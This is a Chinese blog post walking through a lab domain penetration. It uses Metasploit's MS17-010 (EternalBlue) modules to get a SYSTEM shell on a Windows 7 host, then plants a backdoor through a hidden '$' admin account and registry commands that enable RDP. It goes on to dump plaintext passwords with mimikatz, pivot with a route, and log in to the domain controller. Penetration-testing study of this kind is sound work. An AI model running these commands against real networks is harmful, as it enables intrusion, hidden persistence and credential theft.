域渗透详解

已于 2022-10-11 11:35:42 修改
阅读量3.4k 收藏 11
点赞数 3
分类专栏: # 漏洞复现 文章标签: 安全 网络 web安全
于 2022-10-10 20:26:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54037445/article/details/127250660
版权

一、域环境搭建

1、子域主机:Windows7(192.168.162.134),加入域yst;

2、域控制器:Windows2008(192.168.162.150)

3、攻击主机:kali(192.168.162.131)

二、域渗透

1、信息收集:扫描获取目标网段所有主机的IP、系统版本、开放端口等信息;

(1)、ip扫描

6fe336286b3c42d9a667a810c64293ec.png

获取到子域主机IP:192.168.162.134

(2)、详细扫描

daed6e7fe83b45feb0b018a0bf2b4167.png

8e57f274f3934f27b1a58f74e0107bb0.png

目标主机开放445端口,而且系统版本是win7或者2008,主机属于YST域;

二、子域主机的渗透

该主机445端口开放,版本为win7或者2008,符合永恒之蓝漏洞(ms 17-010),所以进行尝试验证:

永恒之蓝漏洞:永恒之蓝漏洞讲解

1、msf下搜索ms 17-010

287f9aab3e034d81899190b1ef95e9d3.png

2、使用auxiliary/scanner/smb/smb_ms17_010进行判断

c53c48922c9441e58c2dcffec8f4a17b.png

配置目标主机,run,检测显示目标主机大概率存在ms17-010

3、接下来使用模块进行漏洞利用

8ea059d910c14232b933ada8fd1ef2cb.png

使用攻击模块,这次为了进行域渗透,dump密码,所以我们要拿到更高权限的shell,因此我们要配置payload

ce9e7d587ac145e7aa9c3ab1b3c478ec.png

配置完payload后,show options

dc8cfab66a044de8b7563c1c91c9a1f1.png

我们需要配置rhost(目标主机IP)和lhost(本机IP)

2bcc22b303ef4420a15336fbf6e13166.png

配置完成后,再次show options查看:

3537a128ed9f45c5a153d63baa96512c.png

进行攻击:exploit

45a9ad7dd9954c9ba0c1a496d40dbe30.png

反弹shell,进行权限查看:

f32043a7788e435086ac1e7e12279318.png

成功拿到子域主机的system权限;

三、域内成员密码dump

1、通过子域主机查看域信息

61908e61ea1e45a4aa39d71d2dea742d.png

域名为:yst.com

2、在拿下的子域主机上留后门

(1)、新建用户

54159ba4e10541b3a513c7d24881f8e1.png

 用户名后带$符,便于隐藏,用户在输入net user命令时,不显示;

(2)、net localgroup administrators rxx$ /add        #将用户rxx$加入管理员组

 (3)、开启3389端口

1、REG ADD HKLMYSYSTEMYCurrentControlSet\Control Terminal" "Server /v fDenyTSConnections /t REG DWORD /d 00000000 /f         #开启3389端口

2、REG ADD HKLMYSYSTEMYCurrentControlSet\Control Terminal" "Server /v fDenyTSConnections /t REG DWORD /d 11111111 /f         #关闭3389端口

c9bc3aea681248ce84a928f842ac7125.png

(3)、远程登陆

rdesktop 192.168.162.134:3389        #linux下远程桌面连接命令

78e5eadcc1334fda94bf8a4e0a887dbd.png

193d8d2c4bd44f48959a88972d48113c.png

 后门成功;

3、获取用户和密码

退出shell,加载猕猴桃(mimikatz),使用keberos模块获取明文密码

8aa60b13fa9b462cbcc962db5ca77a33.png

 四、内网域控渗透

1、内网主机发现,获取域控IP

总结的方法如下:
1、在meterpreter下:
    (1)、run post/windows/gather/arp_scanner rhosts=192.168.162.0/24     #基于arp协议
    (2)、run post/multi/gather/ping_sweep rhosts=192.168.162.0/24        #基于ping命令
    (3)、meterpreter >info post/multi/gather/ping_sweep
2、进入shell,在cmd下:
    ipconfig /all    #查看用户IP信息,主要观察DNS服务器IP
    route print      #查看路由表


两种方法对照着来,判断内网域控主机的IP地址

a4c30faeb27e454bbdcbfc29a528d004.png

通过DNS判断内网域控IP:192.168.162.150

2、端口信息扫描

1、shell下:
C:\Windows\system32>exit            #退出shell,返回到meterpreter

2、meterpreter下:
meterpreter >backgroud               #返回到msf

3、msf下:
route add 192.168.162.134 255.255.255.0 1        #给msf添加路由,方便nmap进行内网扫描

路由添加成功后接下来进行内网扫描,方法如下:
auxiliary/scanner/discovery/udp_sweep    #基于udp协议发现内网存活主机
auxiliary/scanner/discovery/udp_probe    #基于udp协议发现内网存活主机
auxiliary/scanner/netbios/nbname         #基于netbios协议发现内网存活主机
auxiliary/scanner/portscan/tcp           #基于tcp进行端口扫描

4、选择要使用的模块:
(1)、use auxiliary/scanner/discovery/udp_sweep
     set rhosts 192.168.162.150
(2)、use auxiliary/scanner/discovery/udp_probe
     set rhosts 192.168.162.150
(3)、use auxiliary/scanner/netbios/nbname
     set rhosts 192.168.162.150
(4)、use auxiliary/scanner/portscan/tcp
     set rhosts 192.168.162.150

c3cc4de270b9417c9ce0f2137da93e60.png

扫描结果如下:

9dbcbf247b194c0fa1a098733c7cf505.png

3、漏洞利用

域控主机445,3389端口开放,也可能存在ms17-010漏洞,但我们已经拿下了子域主机和域控管理员账号,所以直接利用3389进行远程连接;

(1)、kali连接域控:rdesktop 192.168.162.150:3389

642a22607d0741d1a690b4c404bf5495.png

 (2)、通过猕猴桃查到的密码进行登录

cf8075ce129a4240b69119980fe88ffb.png

 域渗透完成。

star-R
关注
专栏目录
渗透学习
谢公子的博客
07-22 5577
搭建环境 内认证之Kerberos协议详解 Windows的管理 内权限解读 LDAP中常见名称(CN/DN/OU) 内创建机器用户 更改环境密码安全策略 中的ACL访问控制策略和组策略 内工具: ADSI编辑器 查询工具Adfind的用法 渗透内用户枚举和密码喷洒攻击(Password Spraying) 渗透之委派攻击 票据传递攻击(Pass the Ticket,PtT) 哈希传递攻击(Pass-the-Hash,PtH) AS-REP Roa
渗透-Kerberoast 攻击利用详解
内心不种满鲜花就会长满杂草
03-28 2919
Kerberoast 攻击是渗透中经常使用的一种技术,主要通过利用 Kerberos 协议的特定阶段和加密算法的弱点,尝试破解内服务的密码。利用前提:获取了一个普通用户凭据。SPN(Service Principal Name,服务主体名称)是服务的唯一标识符。每个需使用Kerberos来进行身份验证的服务都需要一个SPN。SPN的存在有助于确保在Kerberos身份验证中能够正确地识别和授权服务。
渗透基本技巧
weixin_30652491的博客
01-23 277
0x00 什么是 有人说是一种组织结构,是个安全边界。也有另为一个名字,"活动目录"。不管是什么,它总有一些特点,有了它,对管理一个机构的组织单元,人员,特别是计算机就方便了许多,特别是计算机,因为就是建立在计算机上的。加入里的计算机,共享文件,共享上网就会很方便。 里有个比较重要的角色,控制器(DC)。它有至高无上的权限,它可以在里对其他计算机(DA)胡作...
渗透技术
最新发布
weixin_61966097的博客
09-30 505
渗透是一项复杂的任务,涉及多种技术和策略。- **哈希传递**:获取到用户的NTLM哈希值后,可以直接使用这些哈希值进行身份验证,而无需知道实际的密码。- **漏洞扫描**:使用工具如Nessus或OpenVAS扫描网络中的主机,寻找存在的漏洞。- **纵向移动**:从较低权限的账户向具有更高权限的账户转移,最终目标通常是管理员账户。- **横向移动**:在网络内部的不同主机之间移动,寻找有价值的资产或更高级别的凭证。- **利用漏洞**:一旦发现漏洞,可以利用这些漏洞来获取更高的权限。
渗透
weixin_30776545的博客
07-04 116
当遇到环境,获取到一个成员账号后,如果控制器未打好补丁,则可以利用本文所提到的漏洞,快速获取到控制器权限。 mimikatz也是可以看见sid的 3. 票据注入 使用mimikatz将票据注入到当前内存中,伪造凭证,如果成功则拥有管理权限,可任意访问中所有机器 转载于:https://www.cnblogs.com/...
超详细的渗透过程!
热门推荐
xiaoi123的博客
05-02 1万+
大家好!我们在这个write up 里讲下几个不同的入侵 windows domian 时的横向操作。 内容不会过于深入,而会介绍一些基本技巧和流程. 为了保证测试客观性所以我将使用我们的测试对象 lock domain “REDHOOK”. 希望这会成为我们第一个关于 windows domian 的系列教程. 如果你要具体了解某些细节(比如kerberos 的 tickets)欢迎发email...
渗透技术实战指南:内网渗透详解
资源摘要信息:《内网渗透渗透技术实战指南(渗透一条龙)》是一本专注于内网渗透技术的实战指南书籍。该指南详细介绍了在企业或组织内部网络中进行渗透测试的全过程,特别是针对活动目录(Active Directory,...
[ 内网渗透 ] 渗透技术实战指南(渗透一条龙).rar
02-11
[ 内网渗透 ] 渗透技术实战指南(渗透一条龙)
干货!内网渗透测试之渗透详解!收藏!
zhangpeng999123的博客
03-17 911
渗透测试过程中,我们经常会遇到以下场景:某处于中的服务器通过路由做端口映射,对外提供web服务,我们通过web脚本漏洞获得了该主机的system权限,如果甲方有进一步的内网渗透测试需求,以证明企业所面临的巨大风险,这个时候就需要做内网的渗透。 通常,我们是以获得控制器的权限为目标,因为一旦控制器沦陷,整个内网就尽在掌握中了,在学习渗透之前,我们需要了解一些基础知识。 一、什么是 ...
渗透(Domain penetration)
2301_76786857的博客
01-17 540
其实就是一些计算机所组成的。一个电脑也能是一个,一堆电脑也可以是一个控账号可以登录内任意主机。
安全渗透
kali_Ma的博客
12-04 1608
在通常情况下、即使拥有管理员权限,也无法读取控制器中的C:\Windwos\NTDS\ntds.dit文件(活动目录始终访问这个文件,所以文件被禁止读取)。使用Windows本地卷影拷贝服务可以获得文件的副本。 卷影拷贝服务提取NTDS 在活动目录中,所有的数据都保存在ntds.dit文件中。ntds.dit是一个二进制文件,存储位置为控制器的%SystemRoot%ntds\ntds.dit。ntds.dit中包含(但不限于)用户名、散列值、组、GPP、OU等与活动目录相关的信息。它和SAM文件一样,
【网安小白】----记一个windows渗透详细教程(超级超级保姆级笔记!!!!)
2301_81785032的博客
03-23 1576
windows内网渗透靶场案例分享,编辑不易,请点点赞分享鼓励,谢谢大佬
【内网渗透渗透技巧
weixin_30273931的博客
01-23 651
前言 管理进程转移,使得渗透测试人员能够模拟在互联网上的名管理员账户进行操作。尽管如此,在渗透测试开始之前需要确认系统中进程是否运行。在这篇博文中,我讲介绍5个技巧来帮助大家去做这些事情。 本地检测 查询活跃的控制器 扫描远程系统上运行的任务 扫描远程系统上NetBIOS信息 PSExec扫描远程系统上的身份验证令牌 获取...
渗透的完整过程
diansuimo2268的博客
03-13 375
https://www.cnblogs.com/mujj/articles/5807555.html 转载于:https://www.cnblogs.com/7bit/p/10526909.html
渗透命令
cnbird's blog
12-13 3034
RSoP(Result Strategy of Policy)----策略结果集 策略结果集有什么功能 Gpresult 显示用户或计算机的组策略设置和策略的结果集 (RSOP)。 gpupdate  /force 强制刷新组策略   使用 “nltest /dsgetdc:名”可以查看到所连接的控的IP,名称以及所在站点信息。非常实用。 但此命令有个致命的确定,必须要装有Suppor
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值